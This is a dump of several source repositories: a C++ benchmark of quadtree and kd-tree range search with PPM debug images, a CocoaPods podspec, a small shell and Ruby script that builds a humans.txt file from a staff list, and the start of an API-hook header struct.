            // replace the entry currently at the top of the heap
            results.pop();
            results.push(candidate);
            ct++;
        }
    }
    // quadtree_subdivide creates all four children together, so checking
    // one child pointer is sufficient
    if (node->nw != 0) {
        quadtree_return_subtree(node->nw, results, ct);
        quadtree_return_subtree(node->ne, results, ct);
        quadtree_return_subtree(node->sw, results, ct);
        quadtree_return_subtree(node->se, results, ct);
    }
}
// Depth-first search of the quadtree rooted at `node` for all points inside
// the `query` rect; qualifying points go into `results` (capped at 20
// entries) and `ct` counts pushes. Because points were inserted in ascending
// rank order, the lowest ranks for any region sit at the top of the tree.
static inline void quadtree_search(QuadTree* node, const Rect query, std::priority_queue<Point*, std::vector<Point*>>& results, int& ct) {
    // If this node is fully contained within the search query, return all
    // points in the tree below this node without further rect tests
    if (rects_contained(query, node->bounds)) {
        quadtree_return_subtree(node, results, ct);
    }
    // If this node's boundary rectangle intersects with the query rectangle,
    // test each point stored directly in this node for containment
    else if (rects_intersect(node->bounds, query)) {
        for (std::vector<Point*>::iterator it = node->pts.begin() ; it != node->pts.end(); ++it) {
            if (pt_contained(query, **it)) {
                if (results.size() < 20) {
                    results.push(*it);
                    ct++;
                }
                else if (results.top()->rank > (*it)->rank) {
                    results.pop();
                    results.push(*it);
                    ct++;
                }
            }
        }
        // If there was an intersection, then recursively search the child
        // nodes (quadtree_subdivide creates all four together)
        if (node->nw != 0) {
            quadtree_search(node->nw, query, results, ct);
            quadtree_search(node->ne, query, results, ct);
            quadtree_search(node->sw, query, results, ct);
            quadtree_search(node->se, query, results, ct);
        }
    }
    // Else no intersection and no containment, stop recursing the tree
}
// Subdivides this quadtree node into four equal quadrants, assuming a
// left->right, bottom->up coordinate system:
//          |
//   . (0,1)|        . (1,1)
//          |
// _______._|___________. (1,0)
//          | (0,0)
//          |
// The midpoints are computed once; the arithmetic is identical to the
// previous per-quadrant expressions, just not repeated eight times.
static inline void quadtree_subdivide(QuadTree* parent) {
    if (parent->nw == 0) {
        const float mid_x = parent->bounds.lx + ((parent->bounds.hx - parent->bounds.lx) / 2);
        const float mid_y = parent->bounds.ly + ((parent->bounds.hy - parent->bounds.ly) / 2);
        Rect nw_bounds, ne_bounds, sw_bounds, se_bounds;
        // NW: left half, top half
        nw_bounds.lx = parent->bounds.lx;
        nw_bounds.hx = mid_x;
        nw_bounds.ly = mid_y;
        nw_bounds.hy = parent->bounds.hy;
        parent->nw = quadtree_construct(nw_bounds, parent->depth+1);
        // NE: right half, top half
        ne_bounds.lx = mid_x;
        ne_bounds.hx = parent->bounds.hx;
        ne_bounds.ly = mid_y;
        ne_bounds.hy = parent->bounds.hy;
        parent->ne = quadtree_construct(ne_bounds, parent->depth+1);
        // SW: left half, bottom half
        sw_bounds.lx = parent->bounds.lx;
        sw_bounds.hx = mid_x;
        sw_bounds.ly = parent->bounds.ly;
        sw_bounds.hy = mid_y;
        parent->sw = quadtree_construct(sw_bounds, parent->depth+1);
        // SE: right half, bottom half
        se_bounds.lx = mid_x;
        se_bounds.hx = parent->bounds.hx;
        se_bounds.ly = parent->bounds.ly;
        se_bounds.hy = mid_y;
        parent->se = quadtree_construct(se_bounds, parent->depth+1);
    }
}
// Insert a point into the quadtree rooted at `node`.
// Returns true if the point was stored somewhere in this subtree, false if it
// falls outside the node's bounds.
static inline bool quadtree_insert(QuadTree* node, Point* p) {
    // If this point is outside the bounds of this node, return false early
    if (!pt_contained(node->bounds, *p)) {
        return false;
    }
    // If we have subdivided, delegate to the children. quadtree_subdivide
    // always creates all four children together, so nw != 0 implies the
    // siblings exist - the previous per-sibling null checks were redundant.
    if (node->nw != 0) {
        if (quadtree_insert(node->nw, p))
            return true;
        if (quadtree_insert(node->ne, p))
            return true;
        if (quadtree_insert(node->sw, p))
            return true;
        return quadtree_insert(node->se, p);
    }
    // Leaf node: store the point here while there is room, or unconditionally
    // once the maximum depth has been reached
    if (node->pts.size() < QT_MAX_PER_NODE || node->depth >= QT_MAX_DEPTH) {
        node->pts.push_back(p);
        return true;
    }
    // Full leaf: subdivide, then re-insert into the appropriate new child.
    // Existing points deliberately stay in this node instead of being pushed
    // down: they were inserted in ascending rank order, so the lowest ranks
    // remain at the top of the tree where searches check them first.
    quadtree_subdivide(node);
    return quadtree_insert(node, p);
}
#endif
<file_sep>//
// Gen.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/12/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#ifndef ChurchillNavigationChallenge_Gen_h
#define ChurchillNavigationChallenge_Gen_h
#include "Shared.h"
const int NUM_PTS = 50000;
const int MAX_PT_RANGE = 1024;
//const int NUM_PTS = 100000;
//const int MAX_PT_RANGE = std::numeric_limits<int>::max();
// Per-query record of result counts and elapsed times for one benchmark run
struct QueryResult {
    int i;        // 1-based query index
    int ct_bf;    // result count: brute-force scan
    int ct_qt;    // result count: quadtree search
    int ct_kd;    // result count: kd-tree search
    float bf;     // elapsed milliseconds: brute-force scan
    float qt;     // elapsed milliseconds: quadtree search
    float kd;     // elapsed milliseconds: kd-tree search
    // Initializers listed in declaration order (ct_kd before bf) to match the
    // order members are actually constructed in (-Wreorder)
    QueryResult() : i(0), ct_bf(0), ct_qt(0), ct_kd(0), bf(0), qt(0), kd(0) {}
};
// Random integer in [0, MAX_PT_RANGE).
// NOTE: rand() % N has a slight low-value bias unless N divides RAND_MAX+1;
// acceptable here since the values only seed test data.
static inline int rand_num() {
    return rand() % MAX_PT_RANGE;
}
// Uniform-ish random float in the closed range [a, b], derived from rand()
static inline float random_float(float a, float b) {
    const float t = ((float) rand()) / (float) RAND_MAX;  // t in [0, 1]
    return a + t * (b - a);
}
// Allocate `ct` points with random coordinates in (0, MAX_PT_RANGE) and
// sequential ranks (rank == index), so `points` ends up sorted by ascending
// rank. The caller owns the heap allocations.
void generate_points(int ct, std::vector<Point*>& points)
{
    points.resize(ct);
    for (int i = 0; i < ct; i++) {
        Point* p = new Point();
        p->id = rand() % 10000;  // informational only; ids are not unique
        p->rank = i;             // ascending rank: lower index = lower rank
        // Point() zero-initializes x/y; retry until non-zero so no point
        // sits exactly on the lower boundary
        while (p->x == 0) {
            p->x = random_float(0, MAX_PT_RANGE);
        }
        while (p->y == 0) {
            p->y = random_float(0, MAX_PT_RANGE);
        }
        points[i] = p;
    }
}
// Build `ct` random rectangular range queries.
// Rect's value constructor takes (lx, hx, ly, hy), so each query spans
// [r/2, r] on X and [r2/2, r2] on Y.
void generate_queries(int ct, std::vector<Rect>& queries) {
    for (int i = 0; i < ct; i++) {
        int r = rand_num();
        int r2 = rand_num();
        queries.push_back(Rect(r/2, r, r2/2, r2));
    }
}
#endif
<file_sep>//
// PBM.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/12/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
//
//
// Simple struct for drawing and saving a PPM image
// http://en.wikipedia.org/wiki/Netppm_format#PPM_example
#ifndef ChurchillNavigationChallenge_ppm_h
#define ChurchillNavigationChallenge_ppm_h
#include <fstream>
// In-memory plain-text PPM (P3) image buffer
struct ppm {
public:
    // One RGB pixel; every channel is an 8-bit value in [0, 255]
    struct pixel {
        unsigned char r;
        unsigned char g;  // FIX: was declared `unsigned` (int); now matches r and b
        unsigned char b;
        pixel() : r(0), g(0), b(0) {}
        // FIX: parameters are int (not unsigned char) so out-of-range results
        // from pixel arithmetic (e.g. 255 + 20 or 10 - 30) can be clamped
        // here. With unsigned char parameters the old range checks were dead
        // code because the value had already wrapped during the implicit
        // conversion at the call site.
        pixel(int r, int g, int b) {
            if (r < 0) r = 0; if (r > 255) r = 255;
            if (g < 0) g = 0; if (g > 255) g = 255;
            if (b < 0) b = 0; if (b > 255) b = 255;
            this->r = (unsigned char) r;
            this->g = (unsigned char) g;
            this->b = (unsigned char) b;
        }
        friend pixel operator/(const pixel &p1, const int divisor);
        friend pixel operator-(const pixel &p1, const int sub);
        friend pixel operator+(const pixel &p1, const int add);
        friend bool operator==(const pixel &p1, const pixel& p2);
        friend bool operator!=(const pixel &p1, const pixel& p2);
    };
    // Named color constants (defined out-of-line below)
    const static pixel white;
    const static pixel black;
    const static pixel blue;
    const static pixel red;
    const static pixel yellow;
    const static pixel green;
    std::string version = "P3";         // PPM magic number (plain-text variant)
    std::string comment = "yesssssss";  // comment emitted into the file header
    int width;
    int height;
    std::vector<pixel> pixels;          // row-major, width*height entries
    // Construct a w x h image with every pixel initialized to black
    ppm(int w, int h) : width(w), height(h) { pixels.resize(width*height, ppm::pixel(0, 0, 0)); }
};
// Per-channel integer division (truncating); a non-positive divisor returns
// an unmodified copy instead of dividing by zero
ppm::pixel inline operator/(const ppm::pixel &p1, const int divisor) {
    if (divisor <= 0) return ppm::pixel(p1);
    return ppm::pixel(p1.r / divisor, p1.g / divisor, p1.b / divisor);
}
// Per-channel subtraction (used to darken a color); out-of-range handling is
// delegated to the pixel constructor
ppm::pixel inline operator-(const ppm::pixel &p1, const int sub) {
    return ppm::pixel(p1.r - sub, p1.g - sub, p1.b - sub);
}
// Per-channel addition (used to brighten a color); out-of-range handling is
// delegated to the pixel constructor
ppm::pixel inline operator+(const ppm::pixel &p1, const int add) {
    return ppm::pixel(p1.r + add, p1.g + add, p1.b + add);
}
// Channel-wise pixel equality.
// FIX: `inline` added - this operator is defined in a header, and without
// `inline` every translation unit that includes the header emits its own
// definition, causing multiple-definition link errors (all the sibling
// operators in this header already carry `inline`).
bool inline operator==(const ppm::pixel& p1, const ppm::pixel& p2) {
    return p1.r == p2.r && p1.g == p2.g && p1.b == p2.b;
}
// Negation of the channel-wise equality above
bool inline operator!=(const ppm::pixel& p1, const ppm::pixel& p2) {
    return !(p1 == p2);
}
// Out-of-line definitions for the ppm named color constants declared above.
// NOTE(review): header-scope definitions like these violate the ODR if this
// header is ever included from more than one translation unit - verify the
// include structure, or move them to a .cpp file.
const ppm::pixel ppm::white = ppm::pixel(255,255,255);
const ppm::pixel ppm::black = ppm::pixel(0,0,0);
const ppm::pixel ppm::blue = ppm::pixel(0,0,255);
const ppm::pixel ppm::red = ppm::pixel(255,0,0);
const ppm::pixel ppm::yellow = ppm::pixel(252,255,0);
const ppm::pixel ppm::green = ppm::pixel(90,255,0);
// Convert an (x, y) coordinate into an index into the row-major pixel array.
// The result is clamped into [0, width*height - 1]; the previous version only
// clamped the upper end, so negative coordinates produced a negative index.
static inline int ppm_get_pos(ppm& img, int x, int y) {
    int pos = (y * img.width) + x;
    if (pos < 0) pos = 0;
    if (pos >= img.width*img.height) pos = img.width*img.height - 1;
    return pos;
}
// Draw a horizontal line on the image at row `y`, from column `start`
// (inclusive) to column `end` (exclusive).
// Arguments
//  img      - reference to ppm image to draw on
//  y        - y axis (row) to draw along
//  start    - x position to start at
//  end      - x position to end at (not drawn)
//  c        - draw color
//  override - when false, a pixel is written only if its red channel is 0
//             (treated as "empty"); when true, existing pixels are overwritten
static inline void ppm_draw_line_horiz(ppm& img, int y, int start, int end, ppm::pixel c, bool override=false) {
    // clamp all coordinates into the image bounds
    if (y < 0) y = 0;
    if (y > img.height-1) y = img.height-1;
    if (start < 0) start = 0;
    if (start > img.width-1) start = img.width - 1;
    if (end < 0) end = 0;
    if (end > img.width - 1) end = img.width - 1;
    for (int x = start; x < end; x++) {
        int pos = ppm_get_pos(img, x, y);
        if (img.pixels[pos].r == 0 || override==true)
            img.pixels[pos] = c;
    }
}
// Draw a vertical line on the image at column `x`, from row `start`
// (inclusive) to row `end` (exclusive).
// Arguments
//  img      - reference to ppm image to draw on
//  x        - x axis (column) to draw along
//  start    - y position to start at
//  end      - y position to end at (not drawn)
//  c        - draw color
//  override - when false, a pixel is written only if its red channel is 0
//             (treated as "empty"); when true, existing pixels are overwritten
static inline void ppm_draw_line_vert(ppm& img, int x, int start, int end, ppm::pixel c, bool override=false) {
    // clamp all coordinates into the image bounds
    if (x < 0) x = 0;
    if (x > img.width-1) x = img.width-1;
    if (start < 0) start = 0;
    if (start > img.height-1) start = img.height - 1;
    if (end < 0) end = 0;
    if (end > img.height - 1) end = img.height - 1;
    for (int y = start; y < end; y++) {
        int pos = ppm_get_pos(img, x, y);
        if (img.pixels[pos].r == 0 || override==true)
            img.pixels[pos] = c;
    }
}
// Draw the outline (unfilled) of `rect` on the image.
// The float corners are truncated to ints once up front; previously two calls
// relied on implicit conversion and two used explicit casts.
static void ppm_draw_rect(ppm& img, Rect& rect, ppm::pixel c, bool override=false) {
    const int lx = (int) rect.lx;
    const int hx = (int) rect.hx;
    const int ly = (int) rect.ly;
    const int hy = (int) rect.hy;
    ppm_draw_line_horiz(img, ly, lx, hx, c, override);
    ppm_draw_line_horiz(img, hy, lx, hx, c, override);
    ppm_draw_line_vert(img, lx, ly, hy, c, override);
    ppm_draw_line_vert(img, hx, ly, hy, c, override);
}
// Draw a filled rectangle by painting one vertical line per column, then
// outline it with a slightly brighter (+20 per channel) border.
static inline void ppm_draw_rect_fill(ppm& img, Rect& rect, ppm::pixel c) {
    // loop bounds truncate the float coordinates to ints
    for (int i = rect.lx; i < rect.hx; i++) {
        ppm_draw_line_vert(img, i, (int)rect.ly, (int)rect.hy, c, true);
    }
    ppm_draw_rect(img, rect, ppm::pixel(c.r + 20, c.g + 20, c.b + 20), true);
}
// Set the RGB value for an individual pixel, clamping x/y into the image.
// Yellow pixels are never overwritten (yellow marks kd-tree median points,
// which should stay visible on top of everything else).
static inline void ppm_set_pt(ppm& img, int x, int y, ppm::pixel c) {
    if (x < 0) x = 0;
    if (x > img.width-1) x = img.width-1;
    if (y < 0) y = 0;
    if (y > img.height-1) y = img.height-1;
    int pos = ppm_get_pos(img, x, y);
    if (img.pixels[pos] != ppm::yellow)
        img.pixels[pos] = c;
}
// Debug helper for drawing QuadTree node boundaries and points. The PPM image
// should be the same size as the root node of the quadtree, or point values
// should be converted to match the scale.
// This method is completely optional and not associated with a PPM image.
static void ppm_draw_quadtree(ppm& img, QuadTree* tree, ppm::pixel point_color) {
    // Draw all points stored directly in this node
    // (float coordinates truncate to int pixel positions)
    for (int i = 0; i < tree->pts.size(); i++) {
        ppm_set_pt(img, tree->pts[i]->x, tree->pts[i]->y, point_color);
    }
    // recursively draw all 4 sub nodes of this tree node
    // (quadtree_subdivide creates all four together, so checking nw suffices)
    if (tree->nw != 0) {
        ppm_draw_quadtree(img, tree->nw, point_color);
        ppm_draw_quadtree(img, tree->ne, point_color);
        ppm_draw_quadtree(img, tree->sw, point_color);
        ppm_draw_quadtree(img, tree->se, point_color);
    }
    // draw the boundary rectangle last so it overrides points and child
    // nodes; deeper nodes get progressively darker borders
    ppm_draw_rect(img, tree->bounds, ppm::white - (tree->depth * 30), true);
}
// Debug helper for drawing KdTree node boundaries and points. The PPM image
// should be the same size as the root node of the KdTree, or point values
// should be converted to match the scale.
// This method is completely optional and not associated with a PPM image.
static void ppm_draw_kdtree(ppm& img, KdTree* tree, ppm::pixel point_color) {
    // Draw all points stored in this node except points[0]: that is the
    // median/split point, which is drawn last in yellow so it stays visible
    for (size_t i = 1; i < tree->points.size(); i++) {
        ppm_set_pt(img, tree->points[i]->x, tree->points[i]->y, point_color);
    }
    // Recursively draw the left subdivision
    if (tree->left != 0)
        ppm_draw_kdtree(img, tree->left, point_color);
    // Recursively draw the right subdivision
    if (tree->right != 0)
        ppm_draw_kdtree(img, tree->right, point_color);
    if (tree->points.size() != 0) {
        // Draw the median axis line, depending on the depth (even - X, odd - Y);
        // deeper splits get progressively darker lines
        if (tree->depth % 2 == 0)
            ppm_draw_line_vert(img, tree->points[0]->x, tree->bounds.ly, tree->bounds.hy, ppm::white - (tree->depth * 15), true);
        else
            ppm_draw_line_horiz(img, tree->points[0]->y, tree->bounds.lx, tree->bounds.hx, ppm::white - (tree->depth * 15), true);
        // Highlight the median point itself in yellow
        // (was: a for loop from 0 to 1 that executed exactly once)
        ppm_set_pt(img, tree->points[0]->x, tree->points[0]->y, ppm::yellow);
    }
}
// Serialize the image to a plain-text PPM (P3) file at `outfile`.
// Header layout:
//   P3
//   #<comment>
//   <width> <height>
//   255
static void ppm_write(ppm& img, std::string outfile) {
    // Open output stream
    std::ofstream ofs (outfile, std::ofstream::out);
    // Write the header
    // [Version]
    // [Width] [Height]
    // [Max Color]
    ofs << img.version << '\n';
    ofs << "#" << img.comment << '\n';
    ofs << img.width << " " << img.height << '\n';
    ofs << "255" << '\n';
    // Write pixels, one image row per text line.
    // Channels are cast to int so they print as numbers, not characters.
    for (int y = 0; y < img.height; y++) {
        for (int x = 0; x < img.width; x++) {
            int pos = y * img.width + x;
            ofs << (int)img.pixels[pos].r << " " << (int)img.pixels[pos].g << " " << (int)img.pixels[pos].b << " ";
        }
        ofs << '\n';
    }
    ofs.close();
}
#endif
<file_sep>//
// Shared.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/9/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#ifndef ChurchillNavigationChallenge_Shared_h
#define ChurchillNavigationChallenge_Shared_h
#include <vector>
#include <queue>
struct QuadTree;
struct KdTree;
// A ranked 2D point. Lower rank means higher priority in searches.
struct Point
{
    short id;   // arbitrary identifier (not unique)
    int rank;   // search priority: lower is better
    float x;
    float y;
    Point() : id(0), rank(0), x(0), y(0) {}
    // FIX: the previous copy constructor had an empty body, which left every
    // member of the copy uninitialized. Copy all members properly.
    Point(const Point& o) : id(o.id), rank(o.rank), x(o.x), y(o.y) {}
    // Function-object comparator: orders points by ascending rank
    bool operator()(const Point& l, const Point& r)
    {
        return l.rank < r.rank;
    }
};
// Axis-aligned rectangle: l* is the low (min) corner, h* the high (max) corner.
// NOTE: the value constructor takes (lx, hx, ly, hy) - both X bounds first,
// then both Y bounds - not (lx, ly, hx, hy). Callers must match this order.
struct Rect
{
    float lx;
    float ly;
    float hx;
    float hy;
    // default: degenerate rect at the origin
    Rect() {
        lx = 0;
        ly = 0;
        hx = 0;
        hy = 0;
    }
    Rect(float lx, float hx, float ly, float hy) : lx(lx), hx(hx), ly(ly), hy(hy) {}
    Rect(const Rect& other) { lx = other.lx; ly = other.ly; hx = other.hx; hy = other.hy; }
};
#endif
<file_sep>//
// main.cpp
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/9/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#include <stdlib.h>
#include <fstream>
#include <iostream>
#include <chrono>
#include <cassert>
#include "Shared.h"
#include "Util.h"
#include "QuadTree.h"
#include "KdTree.h"
#include "Gen.h"
#define RENDER_QUADTREE
#ifdef RENDER_QUADTREE
#include "PPM.h"
ppm quadtree_img(1024, 1024);
ppm kdtree_img(1024, 1024);
#endif
std::vector<QueryResult> query_results;
std::vector<Rect> queries;
QuadTree* qt;
KdTree* kdt;
std::vector<Point*> points;
void setup_data(int num_search_queries, int num_points, int max_point_range);
void execute_searches();
void display_search_results();
// Benchmark driver: builds the test data and both trees, optionally renders
// debug images, runs the searches, prints the results, and frees everything.
int main(int argc, const char * argv[])
{
    /* initialize random seed: */
    // NOTE(review): 1000000000000 does not fit in srand's unsigned int
    // parameter on common platforms, so the seed is silently truncated -
    // confirm which seed value was actually intended
    srand (1000000000000);//time(NULL)
    // Setup the Search Query, Points, QuadTree, and KdTree data
    setup_data(1, NUM_PTS, MAX_PT_RANGE);
#ifdef RENDER_QUADTREE
    // Render the QuadTree and KdTree to simple PPM images for visual debugging of subdivision and point dispersement
    ppm_draw_quadtree(quadtree_img, qt, ppm::pixel(75, 75, 145));
    ppm_draw_kdtree(kdtree_img, kdt, ppm::pixel(75, 75, 145));
    // Output the quadtree and kdtree PPM images
    // NOTE(review): output paths are hard-coded to one developer's machine
    ppm_write(quadtree_img, "/Users/ericc/Desktop/quadtree.pbm");
    ppm_write(kdtree_img, "/Users/ericc/Desktop/kdtree.pbm");
#endif
    execute_searches();
    display_search_results();
    // Clean up heap allocations; the trees hold raw Point* but main owns them
    quadtree_delete(qt);
    kdtree_delete(kdt);
    for (int i = 0; i < points.size(); i++) {
        delete points[i];
        points[i] = 0;
    }
    return 0;
}
// Generate the queries and points, then build (and time) both trees.
// Populates the file-scope globals: queries, points, qt, kdt.
void setup_data(int num_search_queries, int num_points, int max_point_range) {
    // Generate random 2D rectangular search queries
    generate_queries(num_search_queries, queries);
    // Generate num_points random points (produced in ascending rank order)
    generate_points(num_points, points);
    // Time measurement
    auto start = std::chrono::steady_clock::now();
    auto end = std::chrono::steady_clock::now();
    auto diff = end - start;
    // Create the QuadTree and insert the points vector
    // (Rect's constructor order is lx, hx, ly, hy)
    /////
    qt = quadtree_construct(Rect(0, max_point_range, 0, max_point_range), 0);
    int insert_ct = 0;
    quadtree_insert(qt, points, insert_ct);
    /////
    end = std::chrono::steady_clock::now();
    diff = end - start;
    std::cout << "QuadTree Creation Time: " << std::chrono::duration <double, std::milli> (diff).count() << " ms" << std::endl;
    start = std::chrono::steady_clock::now();
    // Create the KdTree and insert the points vector
    // (kdtree_insert reorders `points` in place via std::nth_element)
    /////
    kdt = kdtree_construct(Rect(0, max_point_range, 0, max_point_range), 0);
    kdtree_insert(kdt, points);
    /////
    end = std::chrono::steady_clock::now();
    diff = end - start;
    std::cout << "KdTree Creation Time: " << std::chrono::duration <double, std::milli> (diff).count() << " ms" << std::endl;
}
// Run every generated query against the brute-force scan, the quadtree, and
// the kd-tree, timing each strategy and recording the outcome in query_results.
void execute_searches() {
    // Measure search times
    auto start = std::chrono::steady_clock::now();
    auto end = std::chrono::steady_clock::now();
    auto diff = end - start;
    int i = 0;
    for (std::vector<Rect>::iterator q = queries.begin() ; q != queries.end(); ++q) {
#ifdef RENDER_QUADTREE
        // Shade the query rectangle into both debug images
        ppm_draw_rect_fill(quadtree_img, *q, ppm::pixel(15, 15, 15));
        ppm_draw_rect_fill(kdtree_img, *q, ppm::pixel(15, 15, 15));
#endif
        i++;
        // Priority queues for keeping a sorted list of the 20 lowest ranked points
        std::priority_queue<Point*, std::vector<Point*>> results, results2, results3;
        QueryResult qr;
        qr.i = i;
        start = std::chrono::steady_clock::now();
        // Brute force: O(N) containment scan of every point for this query.
        // NOTE(review): the loop variable shadows the outer query counter `i`,
        // and every match is pushed (no cap), so ct_bf can exceed 20 while the
        // tree searches cap their results at 20 - beware when comparing counts.
        for (int i = 0; i < points.size(); i++) {
            if (pt_contained(*q, *points[i]))
                results.push(points[i]);
        }
        end = std::chrono::steady_clock::now();
        diff = end - start;
        qr.bf = std::chrono::duration <double, std::milli> (diff).count();
        qr.ct_bf = results.size();
        // Search quadtree in ~O(log N) time
        start = std::chrono::steady_clock::now();
        int ct = 0;
        quadtree_search(qt, *q, results2, ct);
        end = std::chrono::steady_clock::now();
        diff = end - start;
        qr.qt = std::chrono::duration <double, std::milli> (diff).count();
        qr.ct_qt = results2.size();
        // Search KdTree in O(n^(1-1/k) + m) time, where m is the number of the reported points, and k the dimension of the k-d tree.
        // NOTE: `ct` is not reset before this call; it is only a push counter
        // and the reported counts below come from the queue sizes instead.
        start = std::chrono::steady_clock::now();
        kdtree_search(kdt, *q, results3, ct);
        end = std::chrono::steady_clock::now();
        diff = end - start;
        qr.kd = std::chrono::duration <double, std::milli> (diff).count();
        qr.ct_kd = results3.size();
#ifdef RENDER_QUADTREE
        // Mark the returned points in green (draining the queues empties them)
        while (results2.size() > 0) {
            ppm_set_pt(quadtree_img, results2.top()->x, results2.top()->y, ppm::green);
            results2.pop();
        }
        while (results3.size() > 0) {
            ppm_set_pt(kdtree_img, results3.top()->x, results3.top()->y, ppm::green);
            results3.pop();
        }
#endif
        query_results.push_back(qr);
    }
    std::cout << std::endl;
}
// Print per-query timings and result counts, then the average search time
// for each strategy.
void display_search_results() {
    // Guard: with no recorded queries there is nothing to print, and the
    // average computations below would divide by zero
    if (query_results.size() == 0) {
        std::cout << "No search results to display" << std::endl;
        return;
    }
    float avg_bf = 0;
    float avg_qt = 0;
    float avg_kd = 0;
    // Display search results
    for (std::vector<QueryResult>::iterator q = query_results.begin() ; q != query_results.end(); ++q) {
        std::cout << "=============================================" << std::endl;
        std::cout << "QUERY " << (*q).i << std::endl;
        std::cout << " " << std::endl;
        std::cout << "Brute Force Time: " << (*q).bf << " ms" << std::endl;
        std::cout << "Brute Force Results: " << (*q).ct_bf << std::endl;
        std::cout << " " << std::endl;
        std::cout << "QuadTree Time: " << (*q).qt << " ms" << std::endl;
        std::cout << "QuadTree Results: " << (*q).ct_qt << std::endl;
        std::cout << " " << std::endl;
        std::cout << "KdTree Time: " << (*q).kd << " ms" << std::endl;
        std::cout << "KdTree Results: " << (*q).ct_kd << std::endl;
        std::cout << " " << std::endl;
        avg_bf += (*q).bf;
        avg_qt += (*q).qt;
        avg_kd += (*q).kd;
    }
    // Calculate search time averages
    avg_bf /= query_results.size();
    avg_qt /= query_results.size();
    avg_kd /= query_results.size();
    // Display search averages
    std::cout << "AVG Brute Force Search Time: " << avg_bf << " ms" << std::endl;
    std::cout << "AVG Quad Tree Search Time: " << avg_qt << " ms" << std::endl;
    std::cout << "AVG KdTree Search Time : " << avg_kd << " ms" << std::endl;
}
<file_sep>//
// Util.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/12/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#ifndef ChurchillNavigationChallenge_Util_h
#define ChurchillNavigationChallenge_Util_h
#include "Shared.h"
// true if r1 intersects r2 (touching edges count as intersecting)
static bool inline rects_intersect(const Rect& r1, const Rect& r2) {
    const bool separated = r2.lx > r1.hx || r2.hx < r1.lx ||
                           r2.ly > r1.hy || r2.hy < r1.ly;
    return !separated;
}
// true if r1 fully contains r2 (boundary-inclusive on all four edges)
static bool inline rects_contained(const Rect& r1, const Rect& r2) {
    return r1.lx <= r2.lx && r1.hx >= r2.hx &&
           r1.ly <= r2.ly && r1.hy >= r2.hy;
}
// true if r contains p (boundary-inclusive on all four edges)
static bool inline pt_contained(const Rect& r, const Point& p) {
    return (r.lx <= p.x && r.hx >= p.x) && (r.ly <= p.y && r.hy >= p.y);
}
// Debug print of a point's coordinates (id and rank are not printed)
static inline void print_point(const Point& p) {
    printf("[Point x=%f y=%f]\n", p.x, p.y);
}
// Debug print of a rect in constructor-argument order: lx hx ly hy
// ("%4.f" prints each value with zero decimal places, min width 4)
static inline void print_rect(Rect& rect) {
    printf("[Rect %4.f %4.f %4.f %4.f]\n", rect.lx, rect.hx, rect.ly, rect.hy);
}
#endif
<file_sep># ChurchillNavigationChallenge
http://churchillnavigation.com/challenge/
Efficient range searching of 10 million+ 2D points using a QuadTree or a 2D KdTree
## QuadTree Subdivisions and 2D Point Dispersal

## KdTree Subdivisions and 2D Point Dispersal
 | 7266d24de88c309614fee6f89d49fe5dccfa58ef | [
"Markdown",
"C",
"C++"
] | 8 | C++ | ericc59/ChurchillNavigationChallenge | 4a7ce2e30975e2bc3d959e75c8c1242fa8c4a957 | 35836e95be5b8e35a37e51e365e5d0549ad8f858 |
refs/heads/master | <file_sep>Pod::Spec.new do |s|
s.name = "WWZKit"
s.version = "1.2.4"
s.summary = "A short description of WWZKit."
s.homepage = "https://github.com/ccwuzhou/WWZKit"
s.license = "MIT"
# s.license = { :type => "MIT", :file => "FILE_LICENSE" }
s.author = { "wwz" => "<EMAIL>" }
s.platform = :ios
s.ios.deployment_target = "8.0"
s.source = { :git => "https://github.com/ccwuzhou/WWZKit.git", :tag => "#{s.version}"}
# s.public_header_files = "WWZKit/WWZKit.h"
s.source_files = "WWZKit/*.h"
s.requires_arc = true
s.framework = "UIKit"
# s.default_subspecs = 'Model'
s.subspec 'UIKit+WWZ' do |ss|
ss.source_files = "UIKit+WWZ/*.{h,m}"
end
s.subspec 'WWZKit' do |ss|
ss.subspec 'Model' do |sss|
sss.source_files = "WWZKit/Model/*.{h,m}"
end
ss.subspec 'Controller' do |sss|
sss.source_files = "WWZKit/Controller/*.{h,m}"
end
ss.subspec 'View' do |sss|
sss.source_files = "WWZKit/View/*.{h,m}"
sss.dependency "WWZKit/WWZKit/Model"
sss.dependency "WWZKit/UIKit+WWZ"
end
ss.subspec 'Cell' do |sss|
sss.source_files = "WWZKit/Cell/*.{h,m}"
end
end
end
| fbca93a3dcae5ba429d7143f5b8e1f2f5fd2b15b | [
"Ruby"
] | 1 | Ruby | ccwuzhou/WWZKit | 0036810c2d6c9be330aa1b0b14e76846bab251bf | e6edff960ae7f21885943a47111b2a705925ab17 |
refs/heads/master | <file_sep>cat top.txt > humans.txt;
echo '/* TEAM */' >> humans.txt;
echo '' >> humans.txt;
ruby parse.rb >> humans.txt;
echo '' >> humans.txt;
cat bottom.txt >> humans.txt;
<file_sep>humans.txt
==========
From [humanstxt.org](http://humanstxt.org/):
> It's an initiative for knowing the people behind a website. It's a TXT file that contains information about the different people who have contributed to building the website.
This repository simply contains a couple scripts that fetches the latest [staff roster](https://github.com/ExpoTV/Staff-Roster) and parses it out to a text file.
To generate:
chmod +x build.sh
./build.sh
<file_sep>require 'open-uri'
yml_str = open('https://raw.githubusercontent.com/ExpoTV/Staff-Roster/gh-pages/_data/staff.yml').read;
require 'yaml'
staff = YAML.load(yml_str)
staff.each { |department|
puts department['name']
puts '=' * department['name'].length
department['members'].each { |e|
# puts e
print e['name']
print ' [' + '@' + e['twitter'] + ']' if e['twitter']
# print ' ~ ' + 'https://github.com/' + e['github'] if e['github']
# print ' ~ ' + e['website'] if e['website']
puts "\n"
}
puts "\n"
}
| 72ef9c66198b00e6f143defc9d196a986d169069 | [
"Markdown",
"Ruby",
"Shell"
] | 3 | Shell | ExpoTV/humans.txt | 29279c6c8b45284171813b3ce86989506bc54d82 | 87cc9800428545334fa26a8445220df39cb899c8 |
refs/heads/master | <file_sep>#include "logger.h"
#pragma once
// Standard bookkeeping for a single API hook
struct HOOK_INFO {
    LPCWSTR lib;    // name of the module that exports the target function
    LPCSTR target;  // name of the function to hook
